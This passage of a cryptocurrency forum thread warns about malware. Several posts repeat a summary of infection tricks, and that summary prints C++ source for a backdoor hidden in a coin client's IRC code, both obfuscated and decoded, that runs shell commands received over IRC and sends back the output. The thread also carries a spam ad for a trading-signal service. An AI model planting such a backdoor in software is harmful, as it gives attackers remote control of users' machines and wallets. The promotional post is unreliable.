Bitcoin Forum
November 01, 2024, 03:39:27 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 820205 times)
riffat
Jr. Member
*
Offline Offline

Activity: 149
Merit: 4


View Profile
February 02, 2018, 10:20:46 AM
 #421

No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it at first with the service virusotal:


Thanks for your good suggestion... 

【BLACKBOX OS】 (https://blackboxfoundation.org/)
【The Future of Work. Decentralized.】[/b
Masternodeking
Newbie
*
Offline Offline

Activity: 42
Merit: 0


View Profile
February 03, 2018, 01:10:43 AM
 #422

correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.


Has anyone heard of people gaining access to peoples private keys by watching them write it down by hacking the laptop camera. OR malware that will replace the pasted address with the hackers address.
coindrunk
Newbie
*
Offline Offline

Activity: 29
Merit: 0


View Profile
February 04, 2018, 12:18:11 AM
 #423

If you are on Linux/Unix just use separate user accounts, with restricted access, for each wallet software that tends to be shady
Becassine
Hero Member
*****
Offline Offline

Activity: 2002
Merit: 816



View Profile WWW
February 05, 2018, 03:10:40 AM
 #424

No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it at first with the service virusotal:


Thank you very much for that thing, I will post it in the french section. We don't have such a useful thread there  Undecided

Becassine
Hero Member
*****
Offline Offline

Activity: 2002
Merit: 816



View Profile WWW
February 05, 2018, 03:21:34 AM
 #425

I don't know if this is a malware or what but everytime I copy an address and paste it where I should when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?

Quote
Evrial detects when a bitcoin address is copied to the clipboard, then proceeds to replace it with an address that is under the attacker's domain. However, the virus manages to paste this information into a different application, which makes it more complex, they say.

https://tuscamisetas.net/crypto/new-virus-changes-bitcoin-addresses-from-the-clipboard-to-one-from-the-attacker-criptonews/


ksyusha_so
Jr. Member
*
Offline Offline

Activity: 72
Merit: 4


View Profile
February 05, 2018, 07:07:58 AM
 #426

I personally, didn"t confront anything like that, luckily, but thank you very much for the information. If I find someone, I'll add it to the list.

░|∙.Blend.∙|░░|Blend, the all-in-one solution for cross-platform lending investments|░ (http://blendcoins.io/)
mtthardy4
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
February 06, 2018, 11:43:14 AM
 #427

If you needed to earn good profit through cryptocurrencies than go to this blog

http://cryptocurrenciesconsultant.blogspot.com/

Just buy its consultant service and he would predict and provide you good signals to buy and sell any crypto coins. His most of predication is about 90% perfect. He had good trading experienced to help out other traders as well.

If you had any question aobut how to buy / sell or any related question about the trading and cryptocurrencies than contact him.

I m also using his service from last few months. so i m sharing with you as well
Becassine
Hero Member
*****
Offline Offline

Activity: 2002
Merit: 816



View Profile WWW
February 06, 2018, 12:09:56 PM
Last edit: February 08, 2018, 01:20:20 PM by Becassine
 #428

Hello,

I found a site that check if you have an account that has been compromised in a data breach (https://haveibeenpwned.com/), I want to know from the super geeks if this site is OK ? thank you and have a nice day

Marble777
Member
**
Offline Offline

Activity: 736
Merit: 11


View Profile
February 06, 2018, 05:17:30 PM
 #429

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Obviously because we all know how much money this forum in digital form of course very tempting for hackers to use it by way of embed malware then we must be more careful

E x p e r i e n c e   t h e   F u t u r e   o f   D e F i
██ ███ ██    C a t e n a  X    ██ ███ ██
|        T w i t t e r        |      T e l e g r a m      |   A N N   T h r e a d   |         G i t h u b         |
coin0101
Newbie
*
Offline Offline

Activity: 42
Merit: 0


View Profile
February 07, 2018, 07:18:30 AM
 #430

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
omg that's terrible thanks for sharing this
asifcoiner23
Newbie
*
Offline Offline

Activity: 42
Merit: 0


View Profile
February 07, 2018, 07:19:13 AM
 #431

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
omg that's terrible thanks for sharing this
bitcoiner0101
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
February 07, 2018, 07:19:26 AM
 #432

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
omg that's terrible thanks for sharing this
crypto440
Newbie
*
Offline Offline

Activity: 42
Merit: 0


View Profile
February 07, 2018, 11:06:36 PM
 #433

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
what is the coins name can you please tell me and others so we don't fall for this
Valer4ik
Full Member
***
Offline Offline

Activity: 490
Merit: 101



View Profile
February 08, 2018, 01:53:35 PM
 #434

excellent information thanks guys for the warning. you have done a great job, you are making our community safer. Another noticed one kind of SCAM .. that people who write to you in telegrams and represent managers of ICO projects and offer assistance in investing in their project .....
Marble777
Member
**
Offline Offline

Activity: 736
Merit: 11


View Profile
February 09, 2018, 03:28:44 PM
 #435

excellent information thanks guys for the warning. you have done a great job, you are making our community safer. Another noticed one kind of SCAM .. that people who write to you in telegrams and represent managers of ICO projects and offer assistance in investing in their project .....
Not everything like that bro although everyone wants to get big profits with little effort but still there are many parties who are not tempted by doing a scam

E x p e r i e n c e   t h e   F u t u r e   o f   D e F i
██ ███ ██    C a t e n a  X    ██ ███ ██
|        T w i t t e r        |      T e l e g r a m      |   A N N   T h r e a d   |         G i t h u b         |
bembi
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 09, 2018, 09:12:40 PM
 #436

Thanks that is realy serious i mean coping links would do that we all should be careful
richiesuazo
Newbie
*
Offline Offline

Activity: 69
Merit: 0


View Profile
February 10, 2018, 06:28:55 PM
 #437

wooow, this is really a lot to swallow in for a newbie like me
XtianSincero
Newbie
*
Offline Offline

Activity: 12
Merit: 0


View Profile
February 11, 2018, 08:10:46 AM
 #438

wow very much useful informations...we should be more cautious now specially downloading. thanks
saieshprakash18
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
February 12, 2018, 02:41:51 AM
 #439

thanks, this is helpful
Raul Lopez
Member
**
Offline Offline

Activity: 117
Merit: 10


View Profile WWW
February 12, 2018, 08:26:43 AM
 #440

I appreciate very much this info, thanks a lot!! Wink

■ ■ ■ ■ ■ ■ ■ Find the best price of any book. Book finder and recommendator ■ ■ ■ ■ ■ ■ ■ Libreris
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!